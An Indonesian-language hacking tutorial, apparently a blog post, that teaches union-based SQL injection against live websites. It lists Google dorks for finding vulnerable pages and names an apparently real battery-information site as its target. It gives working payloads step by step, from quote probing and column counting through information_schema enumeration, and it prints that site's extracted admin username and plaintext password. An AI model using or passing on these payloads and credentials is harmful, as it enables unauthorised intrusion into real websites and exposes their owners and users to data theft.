HY EVERY BODY............
Here Iam "Zomb13 a.k.a xhyn00b13" Want to share knowledge about SQL Injection to you all....
SQL injection >>>> sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi command SQL di url suatu web yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Preparation :
1. tool yang dibutuhkan ;
Browser, dork, koneksi ke internet and your mind......
2. Rokok atau camilan.....
3. Lagu-lagu kesukaanmu kalau perlu......
OKey..... silahkan baca dulu kata - kata yang membosankan di atas......
kalau sudah mari kita mulai perjalanan kita..(he... he....)
Step by step :
---->>>> Langkah 1
pertama kita siapkan browser dan dork-nya......
Ini contoh dork yang kami punya....:
inurl:page?ic= site:UTY
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=, dll.
target kali ini adalah situs luar negeri :
http://www.leadacidbatteryinfo.org/newsdetail.php?id=44
kita cek apakah ada lubangnya...
dengan memberi tanda single quote ( ' ).... di akhir URL......
setelah diberi single quote maka muncul kata dibawah ini :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Inilah kata - kata ajaib yang akan membawa kita masuk ke database di dalamnya.... >>>>>
.
---->>> Step 2
setelah itu lalu kita masukkan command..
order by (number)-- <<<<< mencari dan menghitung jumlah table yang ada dalam databasenya..
contoh:
[site]//news_Event/newsDetail.php?ID=-44+order+by+1--
sekarang cek secara satu per satu
contoh:
[site]/news_Event/newsDetail.php?ID=-44+order+by+1--
[site]/news_Event/newsDetail.php?ID=-44+order+by+2--
[site]/news_Event/newsDetail.php?ID=-44+order+by+3--
[site]/news_Event/newsDetail.php?ID=-44+order+by+4--
sehingga muncul error atau hilang pesan error...
misal:
[site]/news_Event/newsDetail.php?ID=-44+order+by+12--
berarti yang kita ambil adalah sampai angka 4
menjadi
[site]/news_Event/newsDetail.php?ID=-44+order+by+11--
---->>> Step3
untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 12 maka:
[site]/news_Event/newsDetail.php?ID=-44+order+by+11--
okey kita dapet nomor togelx : 8,3,4 dan 5
ayo kita inject
tambahkan command "@@version" <<< untuk mencari versi berapa ???
contoh:
[site]/newsDetail.php?ID=-44+union+select+1,2,3,4,5,6,7,@@version,9,10,11--
okey kita beruntung ternyata versi 5.0
lihat versi yg digunakan, jika versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah from+information_schema
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah from+information_schema.
--->>> Step 4
Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- -> dimasukan setelah angka terakhir
contoh:
[site]/newsDetail.php?ID=-44+union+select+1,2,3,4,5,6,7,group_concat(table_name),9,10,11+from+information_schema.tables+where+table_schema=database()--
misal :
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(table_name),9,10,11 from information_schema.tables where table_schema=database()--
perintah unutk melihat isi database di dalamnya.....
okey table databasenya udah muncul tuh......
pdigclicks,pdigengine,pdigexcludes,pdigincludes,pdigkeywords,pdiglogs,pdigsite_page,pdigsites,pdigspider,pdigtempspider,tbladmin,tblbanner,tblbanner_page,tblfaq,tblncategory,tblnew
okey setelah itu kita ingin lihat isi tabel dari "tbladmin"
--->>> Step 5
kita ubah commandx...... untuk melihat isi dari tabelnya.....
Perintah group_concat(column_name) -> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- -> dimasukan setelah angka terakhir
[site]/newsDetail.php?ID=-44+union+select+1,+union+select+1,2,3,4,5,6,7,group_concat(column_name),9,10,11+from+information_schema.columns+where+table_name=0xhexa--
sebelum itu kita convert dulu nama column yang akan dilihat ke hex......
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,group_concat(column_name),9,10,11 from information_schema.columns where table_name=0x74626c61646d696e--
command untuk membaca isi column-nya....
http://centricle.com/tools/ascii-hex/ <<<< site untuk convert dari ascii to hex,,,,,
we gotcha....
adminid,username,password,dom <<< isi dari column tbladmin
--->> Step 6
Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah group_concat(0x3a,hasil isi column yg mau dikeluarkan) -> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) -> dimasukan setelah angka terakhir
[site]/newsDetail.php?ID=-44+union+select+1,group_concat(0x3a,hasil isi column),3,4+from+(nama table berasal)--
http://www.leadacidbatteryinfo.org/newsdetail.php?id=-44 union select 1,2,3,4,5,6,7,concat_ws(0x3a,adminid,0x3a,username,0x3a,password,0x3a,dom),9,10,11 from tbladmin--
command untuk melihat hasil dari isi column tadi
we got it......
1:::ishir:::ishir123:::0000-00-00
okey setelah itu kita coba cari admin pagenya........
cari sendiri aja kali ya... he....
sampai disini dulu ea tutorial kita.......
kapan2 disambung lagi........ he......
credits to ;
Jatimcrew community, echo crew, yogyafre, indoteam, IH crew, devilzc0de, antijasakom, dll.
greetz to :
gr33nc0d3, byz999, xshadow, vyc0d, bom2, phycole, stressdesign, miss_blacklist, CS-31 dan temen2 laen yag gak bisa gue sebutin........
trims atas bimbingannya selama ini..........
Regard From No0bie
-->> Zomb13 a.k.a Xhyn00b13 <<--Label: ./Tutorial
